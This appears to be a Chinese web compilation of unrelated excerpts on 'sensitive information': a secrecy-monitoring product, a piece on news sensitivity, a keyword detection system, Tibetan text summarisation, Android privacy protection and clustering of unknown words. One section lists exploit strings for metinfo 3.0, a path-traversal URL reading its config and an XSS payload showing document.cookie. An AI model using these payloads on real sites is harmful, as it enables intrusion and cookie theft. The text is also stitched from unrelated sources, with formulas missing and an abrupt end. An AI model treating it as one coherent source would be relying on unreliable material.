统计数据表明,接入网络的计算机中存储的文档类文件有大量是重复的(不同的计算机中或同一计算机的不同目录中存在同一份文件)。敏感信息监控管理系统通过自动重复数据处理技术,使得保密管理员鉴别文件是否涉密的效率大幅提升。保密管理员对文件是否涉密的鉴别结果会自动进入系统的涉密文件鉴别知识库,系统会不断积累鉴别经验,每台终端计算机都能够学习这些经验,根据经验做出自动化鉴别,有效减少人工鉴别的工作量,使保密管理员的工作量进一步减轻,使涉密文件的判别更为简单和轻松。举个简单的例子,如果一份文件被保密管理员鉴别为涉密文件,那么全网任何计算机的任何目录中如果存有这份文件的拷贝,那么不用保密管理员人工鉴别,系统会自动将所有文件拷贝列为涉密文件并产生报警信息;如果一份疑似涉密文件被保密管理员鉴别为非密文件,那么全网任何计算机中的该份文件拷贝都不会再作为疑似涉密文件上报上来。
1.2.3 涉密文件处理过程全程跟踪
一旦发现计算机中存在涉密文件,那么对该文件的后续处理过程进行全程跟踪非常重要,必须保证涉密信息得到及时清除,且清除结果被记录在案。使用敏感信息监控管理系统,保密管理员可对发现的违规存储涉密文件的计算机采取如下措施:(1)强制删除。在不经过终端计算机用户许可的条件下强制删除违规存储的涉密文件。(2)通过系统给终端计算机使用者发送警告通知,要求其自行清除涉密文件。终端计算机上会弹出警告提示框,通知计算机使用者其计算机违规存有涉密文件、涉密文件名及存储位置,要求其马上清除,管理员能够监控该涉密文件是否被及时清除。(3)保密管理员一旦发现某台计算机上出现了涉密文件,可以远程对该计算机采取断网或关机等处理措施,防止涉密信息进一步扩散。(4)保密管理员可以将涉密文件全文提取过来,完成取证,为处理、教育保密违规人员保留证据。
1.2.4 基于涉密文件模板的密级分析技术
系统根据涉密文件密级标识的特点,生成对应的涉密文件模板,提取涉密文件模板的特征信息,实现对文件是否涉密的智能分析和鉴定。受计算机语义分析技术发展所限,在当前技术条件下,计算机无法根据文件的内容自动判断文件是否涉密,往往需要辅助人工鉴别,这会增加保密管理员的工作量。敏感信息监控管理系统可以采用涉密文件模板和关键字组合等多种模式对文件是否涉密进行分析。系统对各党政单位的涉密文件模板进行分析和特征提取,形成涉密文件模板库,通过涉密文件模板库对文件进行匹配,能够准确发现和定位涉密文件,大大较少保密管理人员的负担,涉密文件模板库可以动态维护和扩充。
1.2.5 保密技术防护与保密管理考核评价相结合
本系统的设计,凝聚了万里红公司十几年保密技术、保密管理研究的经验,除了符合保密技术防护要求外,更是从保密管理工作的实际情况出发,解决了保密管理员在本身技术水平欠缺的情况下,如果做好保密管理工作的切实问题。保密管理员足不出户,就能对全网内的保密违规行为了如指掌。系统融技术防护、保密工作管理和保密工作考核于一体,不仅仅是一个产品,也是一套解决方案,更是一套管理理念,使得保密管理人员摆脱被动挨打的局面,不会总是在保密出现问题后再焦头烂额的去查处,而是把所有问题实时的展现在自己面前。处理违规问题、教育违规人员、考核下级保密管理员,均在本系统内进行,把以往无从下手的保密管理工作落到实际的自动化系统考核上。
1.2.6 基于全国行政区划地图的可视化报警信息展示平台
系统通过全国行政区划地图对保密违规报警信息进行可视化展示,在报警平台上展示出所有报警信息的地域分布。系统可以快速定位违规存储涉密文件的行为所发生的地点,并可以声、光、动画等形式展现给保密管理员。系统根据各行政区域保密违规行为发生的数量及涉密级别,在地图上的行政区域中自动标识不同颜色,管理员可以通过颜色直观的了解各地区保密违规的严重程度。系统通过折线图、饼图、柱状图等统计图形形式,直观地为保密管理人员展现涉密信息的分布情况、各地区违规行为对比情况,为进一步决策提供基础数据。保密管理员点击图形化显示界面,可以看到报警信息的详细描述,包括违规计算机信息、违规计算机所属单位、部门、责任人、违规文件名、违规文件存储位置、违规文件摘要信息等,报警信息详尽全面,便于根据各种条件进行查询。
敏感信息 篇5
metinfo3.0 文件代码泄露
EXp :localhost/metinfo/templates/met001/../../config
metinfo3.0 XSS 跨站漏洞
exploit :
alert(document.cookie)localhost/metinfo/search/search.php?lang=en&class1=0&class2=0&class3=0&searchtype=0&searchword=1
敏感信息 篇6
美国新闻学者约斯特说:“一个不善于辨别色彩的人,不能成为一个画家;而一个没有新闻敏感度的人,也不能成为一个新闻记者。”就如同我们常说的,“生活中并不缺少美,而是缺少发现美的眼睛”,这个道理放之新闻界皆准。生活中并不缺少新闻,而是缺少对新闻价值敏锐的洞察和评断能力。具备了新闻敏感度,便会发现生活中处处皆是新闻。一个具备很强的新闻敏感度的专业记者,往往能从平凡的事件中发现有价值的新闻,从普通的事物中窥见独特,从细节中洞见真实和深度,以小见大,挖掘新闻价值。而新闻敏感度较弱的记者,则会漠视和反应迟钝,任由新闻价值从身边溜走,从而错失好的新闻。
然而,究竟什么才是新闻敏感度呢?如前面所说,新闻敏感度就是记者迅速准确地识别新闻事实的价值的能力,是新闻记者在长期的新闻工作实践中培养锻炼出的一种特殊的工作素质。记者的新闻敏感度也是记者职业应该具备的一项重要的业务能力,更是记者职业的源泉和职业的生命。新闻敏感度对于挖掘具有价值和影响力的新闻的作用和意义不可小视。首先,新闻敏感度的意义表现在它可以判断新闻事件对当前工作的指导意义,指导记者通过对新闻线索的敏锐的洞察力和捕捉能力,从而进行深入采访并挖掘出具有价值和影响力的新闻事件,并把它报道出来,通过新闻事件的舆论影响力指导该类事件和领域的工作事件,达到警醒和激励的舆论作用力。其次,新闻敏感度的意义还体现在透过新闻表象挖掘出具有深度的新闻价值,从而进行深度采访和报道,以期产生更大的新闻社会影响力。第三,具备新闻敏感度可以帮助记者在同一事物的诸多新闻事件中,有效地鉴别区分出具有价值的新闻事实,避免错失好的新闻。这样看来,新闻敏感度的意义和作用重大,几乎决定着记者的专业度、新闻报道的深度和媒体的高度。
那么,既然新闻敏感度对于记者和传媒机构的作用和意义如此重大,作为一个新闻工作者,该如何通过学习和实践来提高自身对于新闻事件的敏感程度呢?新闻敏感度就相当于记者的工作悟性,是新闻记者政治水平和业务水平的综合体现,是新闻记者发现和判断客观事实是否具有新闻价值的能力。记者的新闻敏感从哪里来?不是靠天生的聪明,也不是凭一时的灵感,更不能是凭借一次两次的运气,而要靠多个方面去进行培养,并且要培养自己的多种能力,才能有效地提高自身的新闻敏感度。
一、不断提高自己的政治理论水平
新闻敏感首先是一种政治敏感。培养新闻敏感,必须倾注高昂的政治热情,树立政治理想和正确的政治观念。首先必须对党的路线、方针、政策有所了解并且吃透,用党的路线、方针、政策去深入分析你所了解到的人和事物。很难设想,一个不读书不看报,对政治缺乏兴趣,对国际国内大事漠不关心的人会有什么新闻敏感度。作为一个新闻工作者,只有你站得高、看得远,分辨能力才能增强,才能从一般事实中看到独特,透过具体小事看到重大的社会意义,挖掘出具有深度的新闻价值,你的稿子才能摸准时代脉搏,成为具有价值和时代影响力的好新闻作品。
二、不断扩大知识面
记者的职业特点是需要有广博的知识,除政治知识外,其他知识也很重要。新闻敏感度是与知识联系在一起的,知识面广的人,思维更为开阔敏捷,因而对新闻的捕捉力也会更强。作为一名新闻工作者,需要在工作和实践中不断学习,积累和丰富自己的知识,树立终身学习的理念,不断学习接受最新的知识,积累广博的知识。这样一来,见识广了,思路开阔了,想象能力也就提升了,新闻敏感度自然会有所提高。
三、多方面培养,提升相关的能力和技能
观察能力:作为新闻工作者,首先应提升自己的观察能力,观察能力强了,便能更简单轻易地从平凡生活中发现新闻价值与线索,于平凡中窥见不凡,于简单中挖掘深度,于细节中发现新闻,从而将观察得来的新闻线索进行深度挖掘,发现新闻价值。在这一过程中,也就提升了自身的新闻敏感度。有了新闻敏感,生活中到处都是新闻。
分析判断能力:新闻工作者,还应着力提高自己的分析判断能力,即掌握“透过现象看本质”的能力,能从诸多新闻事件中敏锐直观地对新闻价值进行判断,对其社会影响力进行初步估算,从而对新闻事件进行有效的取舍和利用,使新闻事件为我所用,而不是被新闻表象“牵着鼻子走”;要理智清醒地对新闻表象进行挖掘和深度采访,对新闻价值进行价值判断和选择,从而辨别出有价值的新闻和具有真实性的新闻,并且提升自己的新闻影响力。
反应能力:对新闻事实具备迅速的反应能力,也是提升新闻敏感度的重要途径。新闻工者应该能够及时发觉新闻,“鼻子”灵敏地嗅到有价值的新闻气息,从而进行追踪报道。在这其中,反应能力尤为重要,新闻工作者切不能对于新闻事件迟钝漠然,那样定会与好新闻失之交臂,更不用提及新闻敏感度的提升和训练。
四、具备优秀的职业素养和职业品德,孜孜不倦,热情不减
一个好的新闻工作者,除上文中所说的一系列能力和素养之外,还应具备良好的职业道德,以及为新闻事业献身的事业心,更重要的是对于新闻事业的一份热爱、坚守与热情。试想,一个不热爱新闻事业的人,一个不具备职业道德和职业责任感的人,他不会费尽心思去做好自己的本职工作,更不用谈及去思考如何提升自己的新闻敏感度、去做一个好的新闻工作者了。因此,如果说职业技能与素养是硬件实力,那么,职业道德、事业心、责任心和高度的热情,便是一个新闻工作者提升自己新闻敏感度和工作能力的软件实力。
综上所述,新闻敏感度对于新闻报道的价值、新闻工作者的能力素养乃至媒体行业的发展,具有重要的作用是毋庸置疑的。作为当代新闻工作者,我们要做的便是从自身本职工作做起,不断提升自己的个人素养和能力,从而更好地培养和提高新闻敏感度,为自己所处的新闻机构作出贡献,体现和实现自身价值,也为中国的媒体行业的发展和腾飞作出自己的微薄之力,竭力对社会提供有价值的和有良好舆论影响力的新闻报道,这不仅仅是我们的心之所向和奋斗目标,更是我们共同的事业和理想。
主机敏感信息检测系统设计与实现 篇7
随着互联网技术的不断发展, 利用开放的互联网开展电子政务建设成为社会发展的必然, 然而同时我们也面临着敏感信息泄露的潜在威胁。在电子政务内部网络计算机内的敏感信息一旦泄漏将对政府单位或企事业单位的工作带来严重的影响。因此, 有必要对电子政务网内的计算机中的文件进行敏感信息检测, 并采取相应的防护措施。
主机是所有信息的终端, 对于政务工作来说, 大量的敏感信息被存放在Word、Txt等文本文档中。对主机的敏感信息检测即对主机内文档是否包含有可能造成泄漏的敏感信息的检测。
主机敏感信息检测是电子政务工作的一部分, 在繁忙的政务工作中应提高检测系统的检测效率, 节省时间。对Word、Txt文档的检索应采用关键词匹配的模式, 针对载有敏感信息文档内含有可能性词汇进行检测, 做到即快又准的完成检测任务, 提高系统工作效率。以实现主机上敏感信息检测和呈现为最终目标, 对内网主机进行实时的敏感信息检测, 及时发现失泄秘隐患, 有效的维护政务应用安全。
2. 系统架构设计
2.1 主机敏感信息检测系统单机版功能设计
主机敏感信息检测系统单机版系统主要包括文件预处理模块、文件分析模块、匹配管理模块、结果呈现模块四大部分, 其结构如图2-1。
单机版系统各模块功能如下:
(1) 配置管理模块:配置敏感词典, 建立检测知识库, 并完成系统其它初始配置。
(2) 文件预处理模块:从系统内搜索txt、doc等类型文件, 将其统一转换为文本数据。
(3) 文件分析模块:基于敏感词典和检测知识库, 发现并记录敏感文件信息。
(4) 结果呈现模块:将检测结果信息呈现给用户, 并可导出为Excel、XML格式文档, 以便打印或与管理平台集成。
2.2 主机敏感信息检测系统网络版功能设计
主机敏感信息检测系统网络版包括服务端和客户端两个主要方面。其中客户端上的代理程序与单机版大体一致, 主机敏感信息检测系统网络版系统结构如图2-2, 用于实现全网终端的敏感信息检测统一管理。
客户端代理功能与单机版功能类似, 服务端以Web方式进行管理。服务端功能设计如下:
(1) 系统管理模块:包括用户管理、权限管理、基础信息 (如终端信息等) 管理。
(2) 策略分发模块:对客户端代理进行统一的策略配置, 并将策略自动分发至客户端。
(3) 信息管理模块:接收客户端代理上报和敏感文件信息, 并具有监测告警、统计分析、查询浏览和结果导出等功能。
3. 核心功能模块的设计与实现
3.1 单机版系统功能界面设计
本敏感信息检测系统的设计本着易操作、人性化的原则, 对系统功能界面架构进行了整合优化。其中单机版敏感信息检测系统功能界面如图3-1。
本检测系统设计过程中采用树形的目标路径选择方式, 使用户更加容易选择目标路径。支持TXT、Doc两种类型文本的搜索, 由用户检测的文件种类选择文件类型。搜索方式有简单检测和多任务检测两种方式, 其中简单搜索执行单一的关键词搜索, 用于简单、初步的系统检测;多任务检测执行多个关键词的顺序检测, 主要用于多个关键词、比较深层次的系统检测。
3.2 Word文档内容解析的实现
系统首先要求用户指定检测范围, 确定要进行检测的文件夹及检测关键词;然后由系统判断某个文件夹是否要进行内容检测, 如果符合用户给定检测范围则进行检测;记录打开文档路径, 对文档内容进行管检测的匹配检测, 检测过程中对匹配次数进行统计, 检测完毕将相同的文件去掉;最后计算匹配次数为一则检测完毕。
3.3 简单检测功能的实现
本系统的简单检测主要是用来执行简单的关键词搜索, 首先用户确定搜索的范围, 然后选择包含搜索关键词的文件类型, 在简单搜索的任务界面输入要搜索的文件关键词和内容关键词, 最后本检测系统根据用户输入的关键词在制定范围内进行检测并对检测结果进行呈现。
3.4 多任务检测功能的实现
多任务检测功能是简单检测功能的强化, 可以执行多关键词更高要求的检测功能。该检测过程是对多个任务中的关键词进行顺序检测, 即检测完第一个任务后再进行下一个任务的检测, 确保所有任务检测完成并实现结果的呈现。具体每个任务的检测过程与简单检测功能过程一致。
3.5 Socket通信的实现
Socket通信大致分为以下几个步骤。服务器端的步骤如下:
(1) 建立服务器端的Socket, 开始侦听整个网络中的连接请求。
(2) 当检测到来自客户端的连接请求时, 向客户端发送收到连接请求的信息, 并建立与客户端之间的连接。
(3) 当完成通信后, 服务器关闭与客户端的Socket连接。
客户端的步骤如下:
(1) 建立客户端的Socket, 确定要连接的服务器的主机名和端口。
(2) 发送连接请求到服务器, 并等待服务器的回馈信息。
(3) 连接成功后, 与服务器进行数据的交互。
(4) 数据处理完毕后, 关闭自身的Socket连接。
4. 系统测试
我们以单机版的主机敏感信息检测系统为例, 按照下面的步骤进行部署和测试:
(1) 在主机上安装VS2008和敏感信息检测系统的运行程序;
(2) 创建一个系统测试文件夹, 命名为Test;
(3) 确定一个文件名关键词和一个内容关键词, 我们都以“机密”为例;
(4) 创建十二个Word文档。前四个文档分别命名为1-4, 其中前2个即不符合文件名关键词也不符合内容关键词;第三个个不符合文件名关键词, 符合内容关键词;第四个文档中关键词以简体、繁体、拼音等形式存在;后面八个文档分为四组, 分别命名为机密、机密1;jimi、jimi1;机密、机密1;非机密、非机密1。每组第一个文档内容不包含关键词, 第二个文档包含检测的关键词。
(5) 运行敏感信息检测程序, 按程序提示进行操作对Test文件夹进行文件名关键词和内容关键词“机密”的信息检测。
(6) 将检测的结果与十二个Word文档进行对照, 分析存在的问题进行总结并改进。
5. 结论
在符合系统测试的平台下我们对敏感信息检测系统的单机版本进行了测试, 测试结果显示有7个文档与其他文档的不同。将其他5个文档进行对比, 发现在检测出来7个文档中的关键词与我们设定的检测关键词完全相同, 而其他文档内相似关键词如繁体“機密”、拼音“jimi”等文档都没有被检测出来。
本系统能够全部检索出来我们设定的关键词, 但只是针对“机密”这个词语简体形式进行检测。由于对于Socket通信掌握的不够熟练, 网络版主机敏感信息检测系统尚未设计成功。
参考文献
[1]赖茂生.科技文献检测.北京:北京大学出版社, 1994.
[2]张曼玲.张桂香, 于瑛.现代信息检测.哈尔滨:哈尔滨工程大学出版社, 2000.
[3]王云.光盘情报检测方法与技巧.北京:北京国防工业出版社, 1997.
[4]张惠惠.美国DIALOG国际联机检测方法.上海:上海交通大学出版社, 1989.
[5]沈固朝.信息检测 (多媒体) 教程.北京:高等教育出版社, 2002.
[6]孙建军.网络信息资源搜集与利用.南京:东南大学出版社, 2000.
[7]何翠华.电子信息资源检测教程.天津:南开大学出版社, 1998.
[8]储荷婷, 张晓林, 王芳.Internet网络信息检测—原理—工具—技巧.北京:清华大学出版社, 1999.
敏感信息 篇8
随着,加快藏文信息化建设进程,互联网不仅成为藏族群众为主的传递信息、共享资源的主要途径和藏族文化传承的重要方式。互联网上藏文为载体的信息不断的增多,不良信息内容繁多,传播速度快,不受限制地流传,将会对网络用户造成巨大影响,给社会造成巨大损失。因此,藏文敏感信息提取的自动文摘处理成为越来越关注的研究课题,也是急需解决的问题之一。
1 基于敏感信息特征加权的方法
基于不同特征的摘要自动生成中,加权方法是一项重要的研究内容,加权的方法和权重的计算对文摘句的抽取有直接的影响。
(1)藏文词语的加权
一篇藏文文章由句子集组成的,句子又由多个词语构成,句子中不同的词语它对文章的贡献度也是不应该相同。词语的加权策略如下:
①标题中出现的词位置权重为2,不在标题中出现的词权重为1。
②通过词在文档中频率越高说明词串越重要。
③把藏文字串的长度函数(以藏文音节个数来计算)与藏文字串的频率函数相乘作为词串的权重。
(2)藏文句子的加权策略如下:
①在段首出现的句子位置权重为2,段末为1。
②句子包含的关键词(高词频等)的权重加权后作为句子权重的一部分,包含关键词的权重高,句子权重也相应提高。
③句子与标题相似度高的句子权重高。
2 基于统计的藏文关键词提取的方法
在藏文文档中抽取关键词串的时候,一般情况下基于字数越长的词出现的概率越小,所包含的信息越丰富,实际上代表的意义却越重要。因为如果词串在文章中出现的频率很高,但是字数短,代表的意义不一定重要。因此采用TLTF(Term Length Term Frequency)方法,TLTF是把字串的长度函数(藏文音节数计算)与字串的频率函数相乘。词权计算公式1:
其中:为词权;为词频;为词串
例如:在整篇文章中出现10次,即词频为10,则通过词权的计算公式计算出该词串的权重是;在整篇文章中出现5次,转换后的词串权重是。根据这种加权方式,以提高藏文长词的词频权重。
3 基于敏感信息特征加权的文摘句选取
3.1 影响藏文句子权重的特征
(1)句子的长度:句子的长度会影响句子包含信息的多少,较长的句子通常比短句包含的信息丰富,同时非常短的句子对文摘的流畅性的影响也比较大,因此本文要求只有句长超过8 个字的句子才有资格成为文摘句。
(2)词频:用词性识别的方法过滤停用词后,能够指示文章主题的有效词往往是高频词,在藏文篇章中不排除低频次词汇对文章指示作用。
(3)标题:标题是概括藏文文章的主要内容。
(4)位置:美国的P.E .Baxendale的调查结果显示:段落的论题是段落首句的概率为85%,是段落末句的概率为7%。因此,有必要提高处于特殊位置的句子的权值。
(5)线索词:类似于藏文中的线索词或短语大多出现在介绍或总结主题的句子中,因此线索词的权重需要提高,显现线索词对文本主题句抽取的重要性。
基于藏文句子信息加权的文摘句选取方法是通过事先采用多种权重度量的方式,综合评价句子反映主题的价值,在此基础上规定的一些特征来计算句子的权重,根据其权重的大小排序来抽取文摘句。
S为待选取的主题句,L为句子的长度,F为标题与句子的相似度,T为标题;P为句子在文章的位置,W为句子中的线索词,B为句子中含有关键词。
3.2 藏文句子相似度计算方法
藏语句子的相似度计算在藏语自然语言处理中关键的技术之一。藏文信息技术各领域中一项基础性的研究课题。在藏文自然语言处理的各个领域都有着非常重要的作用。
(1)词性相似度加权计算方法
藏语句子切分成若干个单词并标注词性的字符串。藏文句子间的相同的关键词中特意加大对动词和名词的权重。其特性用词性权重W表示,这样,在此处计算相同的关键词的个数,若两个关键词相同且动词或名词时,的一个动词的权重为,一个名词的权重为,其他词性权重均为,计算关键词个数时相应词的词性计算对其的权重。公式3如下所示。
其中,为句子间的相似度,表示为句子中相同关键词的个数,表示中的关键词的个数。
例如:藏文句子进行预处理(分词、标注词性)。动词权值为5,名词权值为3,其他词性为1。
以上两个藏文句子S1和S2中3个关键词相同,其中名词3个,动词一个,用词性相似度加权计算方法:
(2)基于向量空间的余弦相似度算法
基于向量空间的余弦相似度算法在计算藏文句子相似度中使用的比较多且效果也较好。在基于向量空间的余弦相似度算法中,将文档看成是由相互独立的词条集构成,每一个句子都可以用一个n维的向量来表示。用同样的方法,对于文档中的每一词条,据其在藏文文档中的重要度赋以一定的权值,并将看成一个n维坐标系中的坐标轴,为对应的坐标值。用同样的方法,可以计算目标句子的n维向量,得到后,它们所对应的两个句子之间相似度就可以C和这两个向量之间夹角的余弦值来表示,公式4如下所示。
以两个完整的藏文句子为例,一首先对进行预处理得到所示的两个句子;将句子中包含的所有有效词的词频向量初始化为,两个句子分别通过各自的词频向量计算余弦相似度得出两个句子的相似度。
4 结束语
本文中主要采用基于不同特征加权及权重度量的方法抽取基于敏感的藏文自动摘要,在藏文句子语义上考虑,难免有所缺失,若能在不同敏感语句特征加权的计算方法之外,辅以其他基于自然语言识别的方法,或许能够更准确地找出敏感信息,这将是未来值得研究和探讨的方向。
参考文献
[1]M.Brunn,Y.Chali,C.J.Pinchak.Text Summarization Using Lexical Chains In Workshop on Text Summarization[J],ACM SIGIR Conference.September 13-14,2001,New Orleans,Louisiana USA.
[2]祁坤钰.藏文分词与标注研究[M].甘肃:民族出版社,2015.
[3]朱文轩.Blog文本内容敏感信息的自动提取技术[D].上海交通大学硕士学位论文,2008.
敏感信息 篇9
Android系统已经成为现在主流的手机操作系统。伴随智能手机的普及, 手机上的隐私保护成为了人们关注的重点。对于Android系统下敏感信息的防护, 国外已经有相关的研究Taintdroid项目。但是该项目仅实现了对敏感信息的监控, 对敏感信息的外泄缺少保护机制。因此, 本文针对Android系统下敏感信息识别和敏感信息外泄拦截两个问题, 实现了一个基于现有Android平台的用户敏感信息防外泄系统。
1 Android 系统的安全机制
Android系统中的权限框架机限制了应用软件对敏感信息的访问, 但这种权限赋予机制本身就存在缺陷。一方面, 安全意识的缺乏使得用户不能正确赋予软件访问权限, 同时软件一旦得到授权之后, 其对敏感信息的使用不再受到控制, 系统也不会通知用户;另一方面, Android系统缺乏应对权限提升攻击的有效机制, 非授权应用软件可以通过进程间的通信 (ICC) 利用其他应用软件的漏洞间接获得敏感信息。因此, 如何有效保护用户的敏感信息已成为Android系统亟待解决和完善的问题。
2 系统详细设计与实现
如图1所示, 本文所设计的敏感信息防外泄系统由四个模块组成:细粒度权限设置模块利用PrivacyProtect软件配置第三方软件对敏感信息的访问权限;敏感信息着色模块实现了对用户隐私敏感信息的标记;软件恶意行为监控模块实现了对软件访问敏感信息行为的实时监控, 当软件进行未授权访问敏感信息, 系统会通过隐私报警提醒用户;敏感信息外泄拦截和欺骗模块实现将软件向外发送的敏感信息进行替换, 这样既确保了系统的稳定性又保证了敏感信息的安全性。
2.1 细粒度权限设置模块
整个隐私防外泄系统中唯一和用户直接交互的部分是基于TISSA的细粒度权限设置模块, 也是唯一包含应用级别的组成, 主要由三部分组成:
Privacy Activity Manager
Package Manager和Application lnstaller的安装时权限扩展插槽
提供权限策略配置存储的Privilege Setting Content Provider
通过细粒度权限设置模块, 敏感信息放防泄系统可以对第三方软件实现无遗漏的权限配置, 向其他模块提供执行隐私保护功能的策略依据。
2.2 敏感信息着色模块
敏感信息着色模块基于隐私保护研究项目TaintDroid。
TaintDroid实现时修改了DVM虚拟机的数据处理指令源码, 通过在内存栈里向敏感信息分配额外的32 bit空间储存着色标签;在敏感信息获取途径上利用Android提供的资源访问模型, 在敏感信息源提供模块中加入hook函数调用着色函数进行着色。本模块只是监视敏感信息从网络泄漏的工具, 并没有提供阻止隐私泄露的措施, 后面将设计敏感信息外泄拦截和替换模块。
2.3 软件恶意行为监控模块
本模块是在应用软件运行过程中, 将网络通信中“抓取”的数据包相关内容反馈给用户, 并“举报”软件未授权访问敏感信息的行为。对染色数据和应用软件访问权限同时检测, 既使得敏感信息即使在被分割、合并、修改后也不会被泄露, 也让软件对敏感信息的使用透明化。
2.4 敏感信息外泄拦截和替换模块
考虑到应用软件因得不到敏感信息可能无法正常工作, 所以本文使用对敏感信息进行伪造替换的策略, 以此来保护敏感信息并保证应用软件的正常运行。同时, 根据隐私报警的反馈信息, 用户能对原本不信任的应用软件进行敏感信息外发策略的修改。模块的具体流程如图2所示:
3 系统测试
在测试的34款常用软件中, 几乎所有软件都涉及用户敏感信息泄露问题 (少数功能单一的软件除外, 如有道词典、excel杀) , 一般会在用户不知晓的情况下将用户敏感信息发送至服务器、广告网站或一些用户未知的网站。
IMEI、IMSI码作为硬件和用户SIM卡唯一标识序列, 软件不应以任何理由将其通过网络端口发送, 在测试中发现共有14款软件将用户IMEI码通过网络端口发送, 其中, 7款软件发送至服务提供方网站, 一款发送至广告网站, 六款软件发送目标IP地址不可访问。
可见, Android第三方软件的用户敏感信息泄露行为较为严重, 应当引起用户的足够重视。
4 结束语
本文主要解决了Android系统下的软件恶意行为识别和敏感信息追踪保护两个问题, 开发了一个用户敏感信息防外泄系统。利用Taintdroid染色机制实现对敏感信息着色、标记与追踪;通过权限配置, 给每个软件不同的权限, 并将软件非法访问未授权敏感信息的行为反馈给用户。同时, 用随机生成的同类型数据对软件进行“欺骗”, 这样既保护了敏感信息, 又保证了软件运行。在手机安全日益被关注的今天, 本系统实现手机系统的自主可控, 有很大的市场前景。
摘要:本文基于原生Android系统, 在已有研究Taintdroid项目的基础上对系统进行深度优化, 并编写了敏感信息监控软件PrivacyProtect, 以此对第三方软件未经“授权”窃取敏感信息的行为进行实时监控。同时, 本文在敏感信息外泄拦截的问题中采用“替换”的策略, 即使用虚假的信息替换敏感信息, 在保护敏感信息的同时保证第三方软件稳定运行。总体上, 该系统能有效地实现自主可控。
关键词:Android系统,窃取敏感信息,替换策略,自主可控
参考文献
[1]廖明华, 郑力明.Android安全机制分析与解决方案初探.2011年9月.
[2]李华峰, Android开发教程, 北京, 电子工业出版社。2010年6月.
[3]郭宏志, Android应用开发详解北京电子工业出版社.2010年6月.
[4]吴剑华, 莫兰芳, 李湘.Android用户隐私保护系统.2012年9月.
敏感信息 篇10
随着大数据时代的到来,如何从海量数据中发掘出对我们有用的知识,已经成为摆在相关领域学者面前最迫在眉睫的问题。虽然我们处在一个多媒体交互的时代,网上的音视频数据越来越多,社交网络中的文本信息也呈现出许多时代特点,如:新词、自造词、假借词等未登录词密度较高;词法、句法等不合乎语言学规则的现象频繁;一些以前从未出现过的“未登录词”,一夜之间流行于网络的各个角落,成为文本数据挖掘必须面对的时代课题。
常见的词聚类方法有基于词典和平行语料库的词聚类,基于相似度的分层聚类方法以及基于深度学习的word2vec算法等。这些算法有的引用场景仅面向某一类词性的特征,还有面向某一具体应用领域,即便是针对通用场景的方法,对于未登录词处理也存在困难,因为词义未知,未登录词聚类很难发挥效力。由于未登录词在社交网站短文本中是频繁出现的,有必要对识别出的未登录词做一定处理。在本文中首先通过word2vec对词语进行聚类,对于无法聚类的未登录词,先暂时去除这些未登录词,将去除未登录词的文本聚类,然后人工标注聚类的话题类型,用聚类的话题类型给未登录词赋予一个替换权重,接着根据替换权重将未登录词与其他词进行聚类。在文本聚类阶段,采用K均值(K-means)聚类方法。
1 K均值聚类算法
K-means算法是一种经典的聚类算法,当给定k个初始点时,它可以将样本集合{x1,x2,…,xn}划分为一系列簇{C1,C2,…Ck},并且保证每个簇内部的样本相似度尽量地大,簇之间样本的相似度尽量地小。假设有n个待分类的文档,需要将其聚为k个类簇,K-means算法的目标是最小化如下函数(1)。
其中 Γnk是一个二值参数,它在文档n被归为类簇k时的取值为1,否则为0。通过直接求解 Γnk以及uk来最小化J的计算复杂度极高,需要通过近似迭代策略来处理最小化问题。在迭代中首先固定uk的值,选择最优的 Γnk值,由欧几里德距离的非负性易知,只有当文本被聚类到与预期最相近的中心点时,J才能取得最小值。在迭代的第二步固定 Γnk,选择最优的uk值,通过求导可得,若使J取得最小值,应满足式(2)。
等式(1-2)表明,当uk的取值是k个类簇中所有文档位置的平均值时,J取得最小值。因为在迭代的每一步中都使J取到该步骤的最小值,因此J值不断向其真实最小值收敛,因此在迭代结束时算法取值将是一个极小值。此外,每一步迭代中,新的中心点可通过公式(3)求解。
通过公式(1)、(2)和(3),K-means算法可以求得局部最优解。K-means聚类的效果如图1 所示。
图1 表明,经过K-means算法处理,拥有相似特性的数据点都聚集在同一个簇内,处在两簇边界的样本,将根据其与中心点的距离,被指派唯一的类属。为了实现如图1 的聚类效果,K均值聚类算法遵循如下步骤。
(1)通过随机选取或者最大化初始距离的方法选定K个初始的中心点,即uk的值;
(2)由于K-means所求得的是局部最优解而非全局最优解,因此初始点的选择对算法的收敛结果有较大影响,多次运行K-means,选择结果最好的一次的初始点作为的uk初值;
(3)将所有样本点聚类到离它们最近的中心点所属的簇中;
(4)通过公式(3)迭代求解每个类簇的新中心点;
(5)重复步骤2,直到迭代轮数达到预先设置的最大迭代数或者J在两轮之间的差值小于某一预设的阈值为止。
按此步骤,通过人工选择的初始点,样本被K-means算法聚集成内部相似度高类间相似度小的若干个簇。通过对这些簇添加类别标签,可以确定簇内每个样本的类别标签。
2 基于K-means的未登录词辅助标注
虽然可以用较小的时间开销识别出文档集内的未登录词,但这些未登录词所代表的话题类别仍然是未知的,对于分类算法它们仅仅是重复出现的字符串。这些词义未知的字符串对特征选择算法和分类器的工作将造成一定影响。
由于在线社区中未登录词表达的含义往往和整篇文本的语义相关,因此可以通过对文本进行敏感话题聚类的方法,巧妙地为未登录词的话题类别加一个基于话题概率的辅助标签。具体做法如下:
(1)在预处理阶段,用机器自动标注未登录词和含有未登录词的文档;
(2)通过现有的特征选择方法,对文档进行降维;
(3)用K-means算法将含有未登录词的文档聚类;
(4)通过人工辅助,对聚好的类簇根据其主题添加话题类别标签;
(5)计算每种未登录词在各类簇中的比例,通过比例值,根据各簇的话题类别标签为未登录词添加情感概率标签。
若设Ti(k)为第k个未登录词在第i个类簇中出现的次数,则关于未登录词k的辅助话题概率权重可由公式(4)给出。
其中N代表文档集合被话题聚类后的类簇数目,也就是K-means算法中的K值。公式(4)表明,关于未登录词的辅助话题概率权重是一个N维向量,满足条件W(k)={ω1(k),ω2(k),…,ωN(k)}。特别地,当未登录词k仅在类簇i中出现时,该未登录词的话题辅助类别等于类簇i的类别标签的概率为1。由于一般K-means算法的K取值为个位数,通过以上步骤,就可以用很小的人工成本,实现大量未登录词的辅助话题类别标注,从而提高后续特征选择和文本分类工作的性能。基于K-means的未登录词话题辅助标注效果示意如图2 所示。
如图2 所示,通过基于K-means的未登录词辅助标注算法处理,在前一阶段被识别出的未登录词都被打上了辅助话题标签,因而在后续的特征提取和分类过程中,这些未登录词和已登录词一样成为词义已知的词汇,对这些词义已知的未登录词的处理性能将的到提高。
3 数学讨论与总体流程
3.1 算法的数学讨论
